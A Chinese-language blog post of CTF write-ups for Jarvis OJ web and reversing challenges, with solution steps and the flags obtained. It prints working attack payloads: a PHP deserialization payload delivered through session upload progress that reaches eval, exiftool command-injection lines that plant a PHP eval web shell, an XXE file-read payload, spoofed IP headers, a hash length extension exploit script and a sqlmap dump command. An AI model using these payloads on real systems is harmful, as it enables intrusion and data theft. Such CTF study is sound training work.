【web】jarvis oj 刷题

web?

1
2
3
4
5
6
7
8
9
10
11
import np
o = [[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135], [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221], [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230], [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80], [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45], [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107], [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249], [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158], [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98], [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141], [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119], [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94], [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208], [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196], [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40], [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123], [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236], [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119], [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196], [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66], [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214], [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212], [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235], [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156], [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]]
r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259]
o = np.array(o)
r = np.array(r)
x = np.linalg.solve(o,r)
print x
string = ''
for i in x:
string += chr(int(str(i)[0:-2]))
print string

phpinfo

反序列化漏洞,比较新的一点是利用了php upload过程中的session来进行漏洞利用。

html构造如下

1
2
3
4
5
<form action="http://web.jarvisoj.com:32784/phpinfo.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" />
</form>

几个payload

print_r(dirname(__FILE__));
print_r(scandir(dirname(__FILE__)));
print_r(file_get_contents("Here_1s_7he_fl4g_buT_You_Cannot_see.php"));
序列化payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
$m = new OowoO();
$m->mdzz = "print_r(dirname(__FILE__));";
echo serialize($m);
//O:5:"OowoO":1:{s:4:"mdzz";s:27:"print_r(dirname(__FILE__));";}
?>

ps:

参考资料
PHP Session 序列化及反序列化处理器 http://www.tuicool.com/articles/zEfuEz

upload

cve漏洞 imagick

exiftool -label="\"|/usr/bin/id; \"" imagick.png

shell

exiftool -label="\"|/bin/echo \<?php \@eval\(\\$\_POST\[a\]\)\;?\> > /opt/lampp/htdocs/uploads/1.php; \"" imagick.png

CTF{873dfee87823248f4a1657650204697a}

api

一开始一脸懵比。。。

原来是XXE攻击

payload一发带走

1
2
3
4
5
6
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

考点:文件包含漏洞

1、泄露源码

但是关键字符被waf挡住了。

上传图片马

uploads/1497485980.gif

还是被waf拦截了,使用<script>绕过

CTF{upl0ad_sh0uld_n07_b3_a110wed}

chopper

考察点:

1
2
3
4
5
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

ssrf中ip.src的构建。

信息获取能力

1
2
3
4
5
6
7
8
9
robots.txt
.index.php.swp
.index.php.swo
index.txt
index.bak
index.php~
test.php
index.phps
phpinfo.php

在robots.txt中找到线索。在burp repeater中,change action method 使get变成post,成功执行。

CTF{fl4g_1s_my_c40d40_1s_n0t_y0urs}

flag在管理员手里

考察点:

信息获取能力

vim缓存文件恢复 vim -r index.php

哈希长度扩展攻击

可利用工具:

https://github.com/iagox86/hash_extender

exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests,os,urllib
for x in range(1000):
cmd = './hash_extender -d ";\\"tseug\\":5:s" -s "3a4727d57463f122833d9e732f94e4e0" -a ";\\"nimda\\":5:s" -f md5 --out-data-format=html -q -l '+str(x)
# print cmd
p = os.popen(cmd).read()
# break
url = "http://web.jarvisoj.com:32778/"
payload = "__cfduid=d08f46c0f9fbc7e86bab05b2d091bb7c81496549709; UM_distinctid=15c715066e3a8a-0f985be0b8ac06-5393662-1fa400-15c715066e4104b; "
payload += "hsh="+p[:32]+";"
payload +="role="+urllib.quote(urllib.unquote(p[32:])[::-1])+";"
# print payload
# break
head = {"Cookie":payload}
data = requests.get(url=url,headers=head).content
if len(data) != 210:
print data

参考资料:

https://ricterz.me/posts/%E5%93%88%E5%B8%8C%E9%95%BF%E5%BA%A6%E6%89%A9%E5%B1%95%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90

RE

逆向思路。。gdb调试一波,拿到flag。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
//动态链接库路径
#define LIB_CACULATE_PATH "./udf.so"
//函数指针
typedef int (*CAC_FUNC)();
int main()
{
void *handle;
char *error;
CAC_FUNC cac_func = NULL;
//打开动态链接库
handle = dlopen(LIB_CACULATE_PATH, RTLD_LAZY);
if (!handle) {
fprintf(stderr, "%s\n", dlerror());
exit(EXIT_FAILURE);
}
//清除之前存在的错误
dlerror();
//获取一个函数
*(void **) (&cac_func) = dlsym(handle, "getflag");
if ((error = dlerror()) != NULL) {
fprintf(stderr, "%s\n", error);
exit(EXIT_FAILURE);
}
(*cac_func)();
dlclose(handle);
exit(EXIT_SUCCESS);
}
gcc -rdynamic -o main main.c -ldl

simple injection

sqlmap -u "http://web.jarvisoj.com:32787/login.php" --data "username=123&password=123" --tamper=space2comment -D injection --dump

×

你要赏我吃糖果吗?

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
  1. 1. web?
  2. 2. phpinfo
  3. 3. upload
  4. 4. api
  5. 5. Easy Gallery
  6. 6. chopper
  7. 7. flag在管理员手里
  8. 8. RE
  9. 9. simple injection
,
隐藏